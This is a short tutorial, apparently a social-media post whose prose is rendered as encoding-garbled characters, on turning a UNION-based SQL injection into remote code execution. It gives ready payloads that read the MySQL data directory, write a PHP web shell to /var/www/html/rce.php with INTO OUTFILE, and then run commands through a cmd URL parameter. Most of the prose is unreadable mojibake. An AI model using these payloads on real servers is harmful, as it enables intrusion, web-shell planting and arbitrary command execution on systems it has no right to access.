π—§π—µπ—² π—³π—¶π—Ώπ€π ππ—µπ—¶π—»π—΄ π„π—² π—±π—Ό π—¶π€ π—°π—µπ—²π—°π—Έ π„π—µπ—²π—Ώπ—² ππ—µπ—² π€π—Ύπ—Ή π—¶π€ π—Ώπ‚π—»π—»π—¶π—»π—΄ π—Όπ—» ππ—µπ—² π€π—²π—Ώπƒπ—²π—Ώ. π—§π—µπ—¶π€ π—¶π€ π—±π—Όπ—»π—² π—―π† π—¶π—»π—·π—²π—°ππ—¶π—»π—΄ ππ—µπ—² π—°π—Όπ—Ίπ—Ίπ—®π—»π—± @@datadir π—¶π—»ππ—Ό ππ—µπ—² π€π—Ύπ—Ή π—Ύπ‚π—²π—Ώπ† ππ—Ό π—΄π—²π ππ—µπ—² π—³π‚π—Ήπ—Ή π—½π—®ππ—µ π—Όπ—³ π—¶ππ€ π—Ήπ—Όπ—°π—®ππ—¶π—Όπ—» π—Όπ—» ππ—µπ—² π€π—²π—Ώπƒπ—²π—Ώ

π—”π€π€π‚π—Ίπ—¶π—»π—΄ π„π—² π—³π—Όπ‚π—»π—± π—® π—Ώπ—²π—³π—Ήπ—²π—°ππ—¶π—Όπ—» π—¶π—» ππ—µπ—² π€π—²π—°π—Όπ—»π—± π—°π—Όπ—Ήπ‚π—Ίπ—» π„π—² π„π—¶π—Ήπ—Ή π—²π—»ππ—²π—Ώ ππ—µπ—² π—³π—Όπ—Ήπ—Ήπ—Όπ„π—¶π—»π—΄ π—½π—®π†π—Ήπ—Όπ—®π—±

π—²π…π—®π—Ίπ—½π—Ήπ—² π—¶π—»π—½π‚π:

'union select 1,@@datadir,3,4 --


π—Όπ‚ππ—½π‚π:

/var/www/html

π—–π—Ώπ—²π—®ππ—² π—® π—³π—¶π—Ήπ—² π—®π—»π—± π—®π—°π—°π—²π€π€ π—¶π π—³π—Ώπ—Όπ—Ί ππ—µπ—² π€π—²π—Ώπƒπ—²π—Ώ π„π—² π„π—¶π—Ήπ—Ή π—»π—²π—²π—± ππ—Ό π—°π—Ώπ—²π—®ππ—² π—¶π π—¶π—» /var/www/html

π—”π—°π—°π—Όπ—Ώπ—±π—¶π—»π—΄ ππ—Ό ππ—µπ—¶π€ π—¶π—»π—³π—Όπ—Ώπ—Ίπ—®ππ—¶π—Όπ—», π—¶πβ€™π€ π—®π—Ήπ—Ώπ—²π—®π—±π† π—½π—Όπ€π€π—¶π—―π—Ήπ—² ππ—Ό π—°π—Ώπ—²π—®ππ—² ππ—µπ—² π—½π—®π†π—Ήπ—Όπ—®π—± π—³π—Όπ—Ώ ππ—µπ—² π€π—µπ—²π—Ήπ—Ή

'union select 1,<php_payload>,3,4 into outfile <path> --

'union select 1,'<?php system($_GET["cmd"]); ?>',3,4 into outfile '/var/www/html/rce.php' --

π—π—³ π—²πƒπ—²π—Ώπ†ππ—µπ—¶π—»π—΄ π„π—Όπ—Ώπ—Έπ€ π—½π—²π—Ώπ—³π—²π—°ππ—Ήπ†. π—π—² π€π—µπ—Όπ‚π—Ήπ—± π—®π—―π—Ήπ—² ππ—Ό π—½π—²π—Ώπ—³π—Όπ—Ώπ—Ί π—Ώπ—²π—Ίπ—Όππ—² π—°π—Όπ—±π—² π—²π…π—²π—°π‚ππ—¶π—Όπ—» π—―π† π—Ήπ—¶π—Έπ—² ππ—µπ—¶π€


http://<host>/rce.php?cmd=<command>

